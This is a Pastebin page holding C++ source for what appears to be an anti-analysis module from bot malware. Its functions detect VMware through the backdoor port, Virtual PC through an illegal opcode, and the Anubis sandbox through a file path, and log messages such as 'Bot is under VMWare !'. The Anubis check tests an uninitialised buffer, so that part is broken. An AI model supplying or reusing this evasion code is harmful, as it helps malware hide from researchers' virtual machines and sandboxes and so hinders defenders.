SHARE
TWEET

VMware C++ By Ahmad Wolf

a guest Mar 30th, 2015 274 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.  
  2. #include "../Headers/includes.h"
  3. #include "../Headers/functions.h"
  4.  
  5. #ifndef NO_ANTIVM
  6.  
  7. DWORD __forceinline IsInsideVPC_exceptionFilter(LPEXCEPTION_POINTERS ep)
  8. {
  9. PCONTEXT ctx = ep->ContextRecord;
  10. ctx->Ebx = -1; // Not running VPC
  11. ctx->Eip += 4; // skip past the "call VPC" opcodes
  12. return EXCEPTION_CONTINUE_EXECUTION;
  13. }
  14.  
  15. bool DetectVPC()
  16. {
  17. bool bVPCIsPresent = FALSE;
  18.  
  19. __try
  20. {
  21. _asm push ebx
  22. _asm mov ebx, 0 // It will stay ZERO if VPC is running
  23. _asm mov eax, 1 // VPC function number
  24. _asm __emit 0Fh
  25. _asm __emit 3Fh
  26. _asm __emit 07h
  27. _asm __emit 0Bh
  28. _asm test ebx, ebx
  29. _asm setz [bVPCIsPresent]
  30. _asm pop ebx
  31. }
  32.  
  33. __except(IsInsideVPC_exceptionFilter(GetExceptionI nformation()))
  34. {
  35. }
  36.  
  37. #ifdef DEBUG
  38. if (bVPCIsPresent==TRUE)
  39. DebugMsg("Bot is under VPC !");
  40. else
  41. DebugMsg("Bot is not running under VPC !");
  42. #endif
  43.  
  44. return bVPCIsPresent;
  45. }
  46.  
  47. bool DetectVMWare()
  48. {
  49. bool bVMWareIsPresent = TRUE;
  50. __try
  51. {
  52. __asm
  53. {
  54. push edx
  55. push ecx
  56. push ebx
  57.  
  58. mov eax, 'VMXh'
  59. mov ebx, 0 // any value but not the MAGIC VALUE
  60. mov ecx, 10 // get VMWare version
  61. mov edx, 'VX' // port number
  62.  
  63. in eax, dx // read port
  64. // on return EAX returns the VERSION
  65. cmp ebx, 'VMXh' // is it a reply from VMWare?
  66. setz [bVMWareIsPresent] // set return value
  67.  
  68. pop ebx
  69. pop ecx
  70. pop edx
  71. }
  72. }
  73. __except(EXCEPTION_EXECUTE_HANDLER)
  74. {
  75. bVMWareIsPresent = FALSE;
  76. }
  77.  
  78. #ifdef DEBUG
  79. if (bVMWareIsPresent==TRUE)
  80. DebugMsg("Bot is under VMWare !");
  81. else
  82. DebugMsg("Bot is not running under VMWare !");
  83. #endif
  84.  
  85. return bVMWareIsPresent;
  86. }
  87.  
  88. bool DetectAnubis()
  89. {
  90. char szBotFile[MAX_PATH];
  91. bool bAnubisIsPresent = FALSE;
  92.  
  93. if (strstr(szBotFile, "C:\\InsideTm\\"))
  94. bAnubisIsPresent = TRUE;
  95.  
  96. #ifdef DEBUG
  97. if (bAnubisIsPresent==TRUE)
  98. DebugMsg("Bot is running under Anubis !");
  99. else
  100. DebugMsg("Bot is not running under Anubis !");
  101. #endif
  102.  
  103. return bAnubisIsPresent;
  104. }
  105.  
  106. bool IsProcessRunningUnderVM()
  107. {
  108. bool bVMWare;
  109. bool bVPC;
  110. bool bAnubis;
  111.  
  112. bVMWare = DetectVMWare();
  113. bVPC = DetectVPC();
  114. bAnubis = DetectAnubis();
  115.  
  116. if (bVPC==TRUE || bVMWare==TRUE || bAnubis==TRUE)
  117. return TRUE;
  118.  
  119. return FALSE;
  120. }
  121. #endif
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top